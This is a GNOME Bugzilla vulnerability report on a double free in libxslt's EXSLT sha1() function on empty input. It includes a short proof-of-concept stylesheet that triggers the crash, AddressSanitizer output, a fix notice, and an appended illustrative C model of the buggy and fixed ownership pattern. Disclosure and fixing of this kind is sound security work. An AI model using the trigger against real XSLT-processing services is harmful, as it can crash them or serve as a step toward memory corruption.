GNOME Bugzilla – Bug 765271
Double free in sha1()
Last modified: 2016-04-20 12:39:33 UTC
Created attachment 326353 [details]
PoC XSLT

As shown under ASan, libxslt will attempt to free a pointer twice when the argument to sha1() is an empty string:
- once in exsltCryptoPopString() line 479
- once in exsltCryptoSha1Function() line 570

These two calls to xmlFree() are very close, so this issue may not be exploitable.

PoC:

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:c="http://exslt.org/crypto">
  <xsl:template match="/">
    <xsl:value-of select="c:sha1('')"/>
  </xsl:template>
</xsl:stylesheet>

Repro:

==34428== ERROR: AddressSanitizer: attempting double-free on 0x60040000c350:
    #0 0x7f630a66d33a (/usr/lib/x86_64-linux-gnu/libasan.so.0+0x1533a)
    #1 0x7f630a19f276 in exsltCryptoSha1Function /home/azureuser/libxslt/libexslt/crypto.c:570
    #2 0x7f6309ec10a0 (/usr/lib/x86_64-linux-gnu/libxml2.so.2+0x910a0)
0x60040000c350 is located 0 bytes inside of 1-byte region [0x60040000c350,0x60040000c351)
freed by thread T0 here:
    #0 0x7f630a66d33a (/usr/lib/x86_64-linux-gnu/libasan.so.0+0x1533a)
    #1 0x7f630a19e0c7 in exsltCryptoPopString /home/azureuser/libxslt/libexslt/crypto.c:479
    #2 0x7f630a19f248 in exsltCryptoSha1Function /home/azureuser/libxslt/libexslt/crypto.c:567
    #3 0x7f6309ec10a0 (/usr/lib/x86_64-linux-gnu/libxml2.so.2+0x910a0)
previously allocated by thread T0 here:
    #0 0x7f630a66d41a (/usr/lib/x86_64-linux-gnu/libasan.so.0+0x1541a)
    #1 0x7f6309edcb88 (/usr/lib/x86_64-linux-gnu/libxml2.so.2+0xacb88)
SUMMARY: AddressSanitizer: double-free ??:0 ??
==34428== ABORTING
Fixed with the following commit: https://git.gnome.org/browse/libxslt/commit/?id=d8862309f08054218b28e2c8f5fb3cb2f650cac7 Thanks for the report.
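As an added illustration (not libxslt's code and not the content of the commit linked above), the ownership mistake behind this report reduced to a small C model: a pop helper that frees the popped string on the empty-string path while its caller also frees it, beside a variant that nulls the caller's pointer so the string has exactly one owner. The function names, dup_string() and the tracking free() are hypothetical stand-ins for xmlXPathPopString() and xmlFree(); the tracker counts a repeated free instead of performing it.

```c
#include <stdlib.h>
#include <string.h>

/* Stand-in for xmlFree(): really frees a pointer once, and reports (instead of
 * performing) any repeated free of the same pointer within one XPath call. */
#define MAX_FREED 8
static void *freed[MAX_FREED];
static int freed_n;

static int tracked_free(void *p) {
    if (p == NULL) return 0;                 /* xmlFree(NULL) is a harmless no-op */
    for (int i = 0; i < freed_n; i++)
        if (freed[i] == p) return 1;         /* second free of an already-freed pointer */
    if (freed_n < MAX_FREED) freed[freed_n++] = p;
    free(p);
    return 0;
}

static char *dup_string(const char *s) {     /* stands in for xmlXPathPopString() */
    char *d = malloc(strlen(s) + 1);
    return d ? strcpy(d, s) : NULL;
}

/* Buggy helper (hypothetical reconstruction of the pre-fix pattern): on empty
 * input it frees the popped string but leaves the caller's pointer dangling,
 * so a caller that also frees on the error path frees the same block twice. */
static int pop_string_buggy(const char *arg, char **str) {
    *str = dup_string(arg);
    int len = (int)strlen(*str);
    if (len == 0) { tracked_free(*str); return 0; }
    return len;
}

/* Fixed helper: identical behaviour, but the caller's pointer is nulled after
 * the free, so there is one owner and the caller's free becomes a no-op. */
static int pop_string_fixed(const char *arg, char **str) {
    *str = dup_string(arg);
    int len = (int)strlen(*str);
    if (len == 0) { tracked_free(*str); *str = NULL; return 0; }
    return len;
}

/* Caller mirroring the sha1() error path: on empty input it frees the string
 * it still believes it owns. Returns the number of double frees observed. */
static int sha1_function(const char *arg, int (*pop)(const char *, char **)) {
    char *str = NULL;
    freed_n = 0;                             /* fresh tracking window per call */
    if (pop(arg, &str) == 0) return tracked_free(str);   /* error path frees too */
    /* ... hashing of str would happen here ... */
    return tracked_free(str);                /* normal path: one owner, one free */
}
```

Run under ASan the buggy pairing reproduces the report's "attempting double-free" abort on sha1(''); the tracker here turns that into a count so both variants can be compared in one process.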